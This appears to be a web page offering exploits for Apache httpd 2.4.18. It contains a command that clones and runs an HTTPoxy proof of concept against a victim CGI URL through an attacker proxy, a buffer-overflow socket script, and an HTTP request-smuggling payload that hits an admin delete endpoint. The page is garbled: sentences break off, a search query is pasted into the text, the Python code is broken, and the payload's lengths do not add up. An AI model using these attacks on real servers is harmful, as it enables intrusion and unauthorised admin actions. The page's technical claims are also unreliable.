Exploit — Apache Httpd 2.4.18

Exploit — Apache Httpd 2.4.18

git clone https://github.com/cujanovic/HTTPOXY-PoC
cd HTTPOXY-PoC
python3 httpoxy.py -u http://victim/cgi-bin/test-cgi -p http://attproxy:8080

Let's consider a hypothetical scenario involving a buffer overflow vulnerability (though, for accuracy, Apache 2.4.18 specific vulnerabilities should be checked against CVE databases).

import socket
# Hypothetical exploit - do not use maliciously
def exploit(target_ip, target_port):
    # Crafting a malicious packet (example only)
    malicious_packet = "A" * 1000  # Assuming a buffer size of 1024
try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((target_ip, target_port))
        client_socket.send(malicious_packet.encode())
    except Exception as e:
        print(f"Failed to exploit: e")
    finally:
        client_socket.close()
# Example usage
exploit("192.168.1.100", 80)

The following CVEs have public proof-of-concept (PoC) exploits effective against unpatched 2.4.18.

To turn this into an exploit, a penetration tester would: apache httpd 2.4.18 exploit

An attacker targeting a 2.4.18 proxy setup might send:

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 50
Transfer-Encoding: chunked
Content-Length: 0

0


GET /admin/delete?user=admin HTTP/1.1
Host: vulnerable-website.com
Foo: x

Technical breakdown: The front-end proxy processes the Transfer-Encoding: chunked, sees the 0 chunk, and ends the request. But Apache 2.4.18 keeps the socket open and interprets the subsequent GET /admin... as a second request—originating from the victim’s IP, bypassing ACLs.